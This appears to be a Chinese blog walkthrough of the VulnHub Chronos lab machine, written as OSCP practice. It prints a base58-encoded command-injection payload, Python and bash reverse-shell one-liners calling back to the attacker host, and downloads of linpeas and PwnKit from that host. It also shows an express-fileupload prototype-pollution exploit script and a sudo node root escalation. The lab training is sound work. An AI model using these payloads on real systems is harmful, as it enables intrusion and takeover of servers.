坚持自律做最好的自己,每天一台,欢迎大家监督
昨天一直公众号一直发不出来文章,不知道为啥……
1-环境搭建
靶机下载地址:
https://www.vulnhub.com/entry/chronos-1,735/kali镜像:
kali-linux-2024.2-virtualbox-amd64虚拟机环境:
Oracle VM VirtualBox 7.0网络:
kali和靶机都选“仅主机(Host-Only)网络”先启动kali,再启动靶机,因为上一台靶机分的是103的ip,所以这次是104kali的IP是192.168.56.101靶机的IP是192.168.56.104
2-靶机实战
2-1-扫描枚举
端口扫描,命令参考OSCP | 信息收集 章节的“6.3 主动信息收集”
sudo nmap -p 1-65535 192.168.56.104[sudo] password for kali:Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-14 21:58 EDTNmap scan report for 192.168.56.104Host is up (0.00016s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http8000/tcp open http-altMAC Address: 08:00:27:6D:FE:C4 (Oracle VirtualBox virtual NIC)
发现22、80、8000端口开放,服务枚举,命令参考“OSCP | 信息收集”章节的“6.3 主动信息收集”
sudo nmap -p22,80,8000 -sT -A 192.168.56.104Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-14 21:59 EDTNmap scan report for 192.168.56.104Host is up (0.00062s latency).PORT STATE SERVICE VERSIONopen ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)ssh-hostkey:2048 e4:f2:83:a4:38:89:8d:86:a5:e1:31:76:eb:9d:5f:ea (RSA)256 41:5a:21:c4:58:f2:2b:e4:8a:2f:31:73:ce:fd:37:ad (ECDSA)256 9b:34:28:c2:b9:33:4b:37:d5:01:30:6f:87:c4:6b:23 (ED25519)open http Apache httpd 2.4.29 ((Ubuntu)): Site doesn't have a title (text/html).: Apache/2.4.29 (Ubuntu)open http Node.js Express framework: Proxy might be redirecting requests: Site doesn't have a title (text/html; charset=UTF-8).: HEAD GET POST PUT DELETE PATCHMAC Address: 08:00:27:6D:FE:C4 (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.8Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.62 ms 192.168.56.104OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 26.70 seconds
22端口为SSH服务,版本是OpenSSH 7.6p1,搜索可利用漏洞无果
80和8000是web服务
目录猜解,无有效漏洞发现
gobuster dir -u http://192.168.56.104 -w /usr/share/wordlists/dirb/common.txt -t 5===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[] Url: http://192.168.56.104[] Method: GET[] Threads: 5[] Wordlist: /usr/share/wordlists/dirb/common.txt[] Negative Status codes: 404[] User Agent: gobuster/3.6[] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.hta (Status: 403) [Size: 279]/.htaccess (Status: 403) [Size: 279]/.htpasswd (Status: 403) [Size: 279]/css (Status: 301) [Size: 314] [--> http://192.168.56.104/css/]/index.html (Status: 200) [Size: 1887]/server-status (Status: 403) [Size: 279]Progress: 4614 / 4615 (99.98%)===============================================================Finished===============================================================gobuster dir -u http://192.168.56.104:8000 -w /usr/share/wordlists/dirb/common.txt -t 5===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[] Url: http://192.168.56.104:8000[] Method: GET[] Threads: 5[] Wordlist: /usr/share/wordlists/dirb/common.txt[] Negative Status codes: 404[] User Agent: gobuster/3.6[] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/date (Status: 500) [Size: 1064]Progress: 4614 / 4615 (99.98%)===============================================================Finished===============================================================
查看80首页源代码
view-source:http://192.168.56.104/发现js代码
<script>var _0x5bdf=['150447srWefj','70lwLrol','1658165LmcNig','open','1260881JUqdKM','10737CrnEEe','2SjTdWC','readyState','responseText','1278676qXleJg','797116soVTES','onreadystatechange','http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL','User-Agent','status','1DYOODT','400909Mbbcfr','Chronos','2QRBPWS','getElementById','innerHTML','date'];(function(_0x506b95,_0x817e36){var _0x244260=_0x432d;while(!![]){try{var _0x35824b=-parseInt(_0x244260(0x7e))*parseInt(_0x244260(0x90))+parseInt(_0x244260(0x8e))+parseInt(_0x244260(0x7f))*parseInt(_0x244260(0x83))+-parseInt(_0x244260(0x87))+-parseInt(_0x244260(0x82))*parseInt(_0x244260(0x8d))+-parseInt(_0x244260(0x88))+parseInt(_0x244260(0x80))*parseInt(_0x244260(0x84));if(_0x35824b===_0x817e36)break;else _0x506b95['push'](_0x506b95['shift']());}catch(_0x3fb1dc){_0x506b95['push'](_0x506b95['shift']());}}}(_0x5bdf,0xcaf1e));function _0x432d(_0x16bd66,_0x33ffa9){return _0x432d=function(_0x5bdf82,_0x432dc8){_0x5bdf82=_0x5bdf82-0x7e;var _0x4da6e8=_0x5bdf[_0x5bdf82];return _0x4da6e8;},_0x432d(_0x16bd66,_0x33ffa9);}function loadDoc(){var _0x17df92=_0x432d,_0x1cff55=_0x17df92(0x8f),_0x2beb35=new XMLHttpRequest();_0x2beb35[_0x17df92(0x89)]=function(){var _0x146f5d=_0x17df92;this[_0x146f5d(0x85)]==0x4&&this[_0x146f5d(0x8c)]==0xc8&&(document[_0x146f5d(0x91)](_0x146f5d(0x93))[_0x146f5d(0x92)]=this[_0x146f5d(0x86)]);},_0x2beb35[_0x17df92(0x81)]('GET',_0x17df92(0x8a),!![]),_0x2beb35['setRequestHeader'](_0x17df92(0x8b),_0x1cff55),_0x2beb35['send']();}</script>
发现url
http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL8000端口,和目录猜解获得参数data一致,修改hosts文件增加一条域名解析
sudo vi /etc/hosts192.168.56.104 chronos.local
再次访问80端口首页,发现页面中多了
Today is Monday, July 15, 2024 07:49:34. 也就是对8000端口的请求可以让页面返回当前时间,看返回时间格式很想调用系统命令date返回的数据,可以尝试命令注入,但需要知道format参数的编码和解码方式才可以将命令编码后进行提交
使用https://gchq.github.io/CyberChef/的Magic方法尝试破解编码方式,发现是base58编码方式
解码后数据是
'+Today is %A, %B %d, %Y %H:%M:%S.'正好是date命令的参数
2-2-漏洞利用
知道了编码方式就可以进行命令注入了
使用https://www.revshells.com/生成反弹shell的payload,linux下一般使用python的比较稳
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'payload前面加上&&后,使用https://gchq.github.io/CyberChef/进行base58编码
51DUqhkvPzqZYidUEQdLApqEeBKjsV5mBsPQK7VB8AvukMKKRKuPWe4pqnknnpdU7mP3yCzAV9wTRkg1YXoTGQczsMcW4nBLRC624nmWZEnYMfzKQo5PpWWtPRfRm3KC47nGRpCWA3z3RgKLxb5XvcVex4TN5GKKELin6LNDRxYJfgQhi3jptn1fpSB26SvVGZsA2ytRtw9vP7Nb9Q7hGU1gJ65FTEWcN5ZkpZ5pumJePPsQXBcLAKfT7iKxT7kRhomRoVeBKLog6hkY1iWVZQ7k13RxYmhVfMHTENRQ96NskA使用brup进行提交
GET /date?format=51DUqhkvPzqZYidUEQdLApqEeBKjsV5mBsPQK7VB8AvukMKKRKuPWe4pqnknnpdU7mP3yCzAV9wTRkg1YXoTGQczsMcW4nBLRC624nmWZEnYMfzKQo5PpWWtPRfRm3KC47nGRpCWA3z3RgKLxb5XvcVex4TN5GKKELin6LNDRxYJfgQhi3jptn1fpSB26SvVGZsA2ytRtw9vP7Nb9Q7hGU1gJ65FTEWcN5ZkpZ5pumJePPsQXBcLAKfT7iKxT7kRhomRoVeBKLog6hkY1iWVZQ7k13RxYmhVfMHTENRQ96NskA HTTP/1.1Host: chronos.local:8000User-Agent: ChronosAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://192.168.56.104Connection: closeReferer: http://192.168.56.104/If-None-Match: W/"29-mWclfOsbI2M6WSeGsdwHxV32H/Y"
在kali的443端口获得shell
nc -lvnp 443listening on [any] 443 ...connect to [192.168.56.101] from (UNKNOWN) [192.168.56.104] 46412$ididuid=33(www-data) gid=33(www-data) groups=33(www-data)ls /homels /homeimeracd /home/imeracd /home/imeralslsuser.txtcat user.txtcat user.txtcat: user.txt: Permission denied
获得shell和home下imera目录,但是没有读取user.txt权限,准备提权
3-权限提升
3-1-提权枚举
上传linpeas.sh运行,,命令参考“OSCP | Linux提权”章节的“17.1.3 自动枚举”
cd /tmpwget http://192.168.56.101/linpeas.shchmod +x ./linpeas.sh./linpeas.sh
发现提示
[+] [CVE-2021-4034] PwnKitDetails: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txtExposure: probableTags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaroDownload URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
3-2-提权利用
这里我使用的是[CVE-2021-4034] PwnKit(https://github.com/ly4k/PwnKit)
wget http://192.168.56.101/PwnKitchmod +x ./PwnKitiduid=0(root) gid=0(root) groups=0(root),1001(john)
获得user.txt和root.txt
root@chronos:/tmp# iduid=0(root) gid=0(root) groups=0(root),33(www-data)root@chronos:/home/imera# cat user.txtcat user.txtbyBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UKroot@chronos:~# cat root.txtcat root.txtYXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEKroot@chronos:~#
还有一种方式提权,linpeas结果中发现主机开启了8080端口
╔══════════╣ Active Ports╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-portstcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -tcp6 0 0 :::22 :::* LISTEN -tcp6 0 0 :::8000 :::* LISTEN 837/nodetcp6 0 0 :::80 :::* LISTEN -
该端口开启另一个web应用,在进程信息中发现
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════╚════════════════════════════════════════════════╝╔══════════╣ Cleaned processes╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processesroot 1 0.0 0.6 225076 8816 ? Ss 01:55 0:01 /sbin/init maybe-ubiquityroot 408 0.0 0.9 111056 12848 ? S<s 01:55 0:00 /lib/systemd/systemd-journaldroot 414 0.0 0.1 97716 1792 ? Ss 01:55 0:00 /sbin/lvmetad -froot 771 0.0 0.1 613212 1804 ? Ssl 01:55 0:00 /usr/bin/lxcfs /var/lib/lxcfs/daemon[0m 772 0.0 0.1 28340 2416 ? Ss 01:55 0:00 /usr/sbin/atd -fmessage+ 775 0.0 0.3 50060 4656 ? Ss 01:55 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only└─(Caps) 0x0000000020000000=cap_audit_writeroot 817 0.0 1.3 169104 17364 ? Ssl 01:55 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggerssyslog 829 0.0 0.3 267276 4584 ? Ssl 01:55 0:00 /usr/sbin/rsyslogd -nimera 830 0.0 2.9 598880 38276 ? Ssl 01:55 0:00 /usr/local/bin/node /opt/chronos-v2/backend/server.js
查看/opt/chronos-v2/backend/server.js
cat /opt/chronos-v2/backend/server.jsconst express = require('express');const fileupload = require("express-fileupload");const http = require('http')const app = express();app.use(fileupload({ parseNested: true }));app.set('view engine', 'ejs');app.set('views', "/opt/chronos-v2/frontend/pages");app.get('/', (req, res) => {res.render('index')});const server = http.Server(app);const addr = "127.0.0.1"const port = 8080;server.listen(port, addr, () => {console.log('Server listening on ' + addr + ' port ' + port);});
发现这个应用就是8080端口的,并且只对127.0.0.1开放访问,代码中express-fileupload,存在命令指令漏洞
利用方式https://po6ix.github.io/Real-World-JS-1/
import requestscmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.101/8888 0>&1"'# polluterequests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})# execute commandrequests.get('http://127.0.0.1:8080'
上传到靶机后运行
$ wget http://192.168.56.101/shell8888.py$ python3 ./shell8888.py
kali的8888端口获得shell
nc -lvnp 8888listening on [any] 8888 ...connect to [192.168.56.101] from (UNKNOWN) [192.168.56.104] 42200bash: cannot set terminal process group (830): Inappropriate ioctl for devicebash: no job control in this shellimera@chronos:/opt/chronos-v2/backend$ ididuid=1000(imera) gid=1000(imera) groups=1000(imera),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)imera@chronos:/opt/chronos-v2/backend$ cd ~cd ~imera@chronos:~$ cat user.txtcat user.txtbyBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UKimera@chronos:~$
提权可以用PwnKit,也可以查看sudo信息,后发现node,使用https://gtfobins.github.io/gtfobins/node/#sudo提权
imera@chronos:~$ sudo -lsudo -lMatching Defaults entries for imera on chronos:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binUser imera may run the following commands on chronos:(ALL) NOPASSWD: /usr/local/bin/npm *(ALL) NOPASSWD: /usr/local/bin/node *imera@chronos:~$ sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'<ild_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'iduid=0(root) gid=0(root) groups=0(root)cat /root/root.txtYXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK
打靶方法有很多,大家多尝试多交流
如有好的靶机欢迎后台留言推荐
或者小伙伴有靶机实战笔记也可后台发我分享哈
坚持自律做最好的自己
原文始发于微信公众号(高级红队专家):OSCP实战靶机 | Chronos
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论